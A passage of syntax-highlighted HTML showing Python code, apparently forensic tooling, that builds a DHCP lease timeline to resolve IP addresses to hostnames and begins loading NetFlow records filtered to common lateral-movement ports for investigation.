operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Assign'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> ip </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> active</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    old </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> active</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">old</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> old</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> old</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                active</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> ev</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">elif</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Release'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Lease_Expired'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"> ip </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> active</span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                old </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> active</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">pop</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">old</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token 
plain\"> old</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> old</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ev </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> active</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">items</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">.</span><span class=\"token plain\">ip_timeline </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">dict</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[+] DHCP: loaded timeline for </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">self</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token string-interpolation interpolation\">ip_timeline</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> IPs\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"> 
   </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">resolve_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> query_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Resolve IP address to hostname at a given time using DHCP timeline.\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> start</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> end</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> mac </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token 
plain\">ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> start </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> query_time </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">end </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">is</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token plain\"> query_time </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> end</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> mac</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'unknown'</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Fallback to IP if no DHCP record</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">load_netflow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> csv_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> lateral_ports</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Load NetFlow records, focusing on lateral movement ports.\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> lateral_ports </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">is</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            lateral_ports </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">445</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">135</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">3389</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5985</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> 
</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5986</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">22</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">23</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">139</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">open</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">csv_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> row </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> csv</span><span class=\"token 
punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">DictReader</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">try</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    dst_port </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">int</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 
47%)\">if</span><span class=\"token plain\"> dst_port </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> lateral_ports</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">netflow_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">fromisoformat</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span 
class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'src_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'src_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> 
dst_port</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'bytes'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">int</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'bytes'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'flags'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'flags'</span><span class=\"token punctuation\" 
